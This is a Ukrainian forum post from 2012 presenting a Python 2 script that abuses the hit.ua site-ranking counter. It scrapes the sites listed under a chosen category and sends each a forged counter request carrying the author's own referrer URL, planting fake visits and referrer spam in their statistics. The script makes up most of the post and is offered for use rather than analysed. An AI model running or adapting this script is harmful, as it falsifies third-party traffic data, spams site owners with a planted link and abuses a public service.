Тема: hit.ua. Залишаємо свій слід
Трохи дослідив рейтинг сайтів hit.ua. Виявляється, що можна звичайним звертанням до серверу з певними параметрами додати хибний запит про сторінку переходу (вставити свій наприклад)
Щоб було цікавіше можна вибрати певну категорію і зібрати з неї сайти на які відсилаються хибні запити.
Параметр сторінки переходу:
&r=http%3A//replace.org.ua/
Категорія, початкова сторінка, кінцева сторінка:
parse_category('connection', 0, 20)
Код:
#!/usr/bin/python
# date: May 19, 2012
import urllib
import random
import re
import time
def fake_user(site_id, site_url):
random.seed()
url = 'http://c.hit.ua/hit?i=' \
+ str(site_id) \
+ '&g=0&x=2&s=1&c=0&t=-180&j=1&w=1440&h=900&d=24&' \
+ str(random.random()) \
+ '&r=http%3A//replace.org.ua/&u=' + site_url
f = urllib.urlopen(url)
source = f.read()
print 'fake', site_id, site_url
f.close()
def parse_category(category, start_page, pages):
page = start_page
while page <= pages:
url = 'http://hit.ua/theme/'+category+'?p=' + str(page)
f = urllib.urlopen(url)
source = f.read()
match_list_url = re.findall(r"<td><a href='(.*)' target=_blank title='.*'>.*</a></td>", source)
match_list_id = re.findall(r"<a href='/site_view/(.*)'><img src='/i/stat0.gif' width=15 height=13", source)
if match_list_url and match_list_id:
print page, ' was parsed'
i = 0
while i < len(match_list_id):
match_id = match_list_id[i]
match_url = match_list_url[i]
fake_user(match_id, match_url)
i += 1
else:
print page, ' was not parsed. Parse error'
f.close()
page += 1
def main():
random.seed()
parse_category('connection', 0, 20)
if __name__ == '__main__':
main()